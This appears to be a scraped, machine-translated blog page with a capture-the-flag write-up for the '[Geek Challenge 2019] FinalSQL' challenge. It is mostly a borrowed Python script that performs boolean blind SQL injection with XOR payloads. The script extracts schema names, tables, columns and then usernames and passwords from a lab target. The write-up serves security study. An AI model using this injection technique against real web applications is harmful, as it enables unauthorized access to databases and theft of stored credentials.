当前位置:网站首页>[geek challenge 2019] finalsql 1
[geek challenge 2019] finalsql 1
2022-07-27 08:13:00 【weixin_ fifty-three million one hundred and fifty thousand four】
List of articles
Weekly learning summary
Open the web link :
It's useless to enter the input box here , This question reminds us SQL Inject , Now follow the prompts and clickFifth display :
Here we look at the sixth page :
Combined with the tips given by the web page, this may be an injection point and a blind injection , And then use burp Test and filter those , Filtered spaces, etc , Here I use sqlmap Blind injection but not how to use , I found it online The bosses payload
import requests import time url = "http://269eac17-6039-4ac9-a491-e6e090ef7bd5.node4.buuoj.cn:81/search.php" temp = { "id": ""} column = "" for i in range(1, 1000): time.sleep(0.06) # Time interval between low = 32 high = 128 mid = (low + high) // 2 while (low < high): # Library name first %d Refers to the first few characters the second %d Refers to the size of the current character # temp["id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" %(i,mid) # Table name # temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1" %(i,mid) # Field name # temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" %(i,mid) # Content temp["id"] = "1^(ascii(substr((select(group_concat(id,username,password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid) # r = requests.get(url, params=temp) time.sleep(0.04) print(low, high, mid, ":") if "Click" in r.text: low = mid + 1 else: high = mid mid = (low + high) // 2 if (mid == 32 or mid == 127): break column += chr(mid) print(column) print("All:", column)Finally, you can get flag
summary
- The information displayed on the page needs to be analyzed
边栏推荐
- Introduction, installation and use of netdata performance monitoring tool
- DEMO:ST05 找文本ID 信息
- mqtt指令收发请求订阅
- 2020国际机器翻译大赛:火山翻译力夺五项冠军
- An ordinary autumn recruitment experience
- "Basic knowledge of PHP" implement mathematical operations in PHP
- [applet] the upload of the wechat applet issued by uniapp failed error: error: {'errcode': -10008,'errmsg':'Invalid IP
- Gossip: is rotting meat in the pot to protect students' rights and interests?
- Ubuntu: install PostgreSQL
- 浅谈数据安全
猜你喜欢
File name wildcard rules for kettle
Download and usage of sequel Pro
企业架构驱动的数字化转型!
I can't figure out why MySQL uses b+ trees for indexing?
Teach you to build a nail warning robot hand in hand
Translation character '/b' in C #
【Day42 文献精读】A Bayesian Model of Perceived Head-Centered Velocity during Smooth Pursuit Eye Movement
Promise details
pytorch_demo1
"PHP Basics" PHP statements and statement blocks
随机推荐
Five day travels to Beijing
"PHP Basics" PHP statements and statement blocks
Data extraction 1
软件调优方法有哪些?看看飞腾技术专家怎么说 | 龙蜥技术
Promise details
C language: random generated number + insertion sort
How to update PIP3? And running PIP as the 'root' user can result in broken permissions and conflicting behavior
QingChuang technology joined dragon lizard community to build a new ecosystem of intelligent operation and maintenance platform
一文速览EMNLP 2020中的Transformer量化论文
[netding cup 2020 Qinglong group]areuserialz (buuctf)
C语言:随机生成数+插入排序
浅谈数据安全
Introduction, installation and use of netdata performance monitoring tool
How to analyze and locate problems in 60 seconds?
End of year summary
API 版本控制【 Eolink 翻译】
[golang] golang develops wechat official account web page authorization function
shell脚本学习day01
DEMO:ST05 找文本ID 信息
Lua有状态迭代器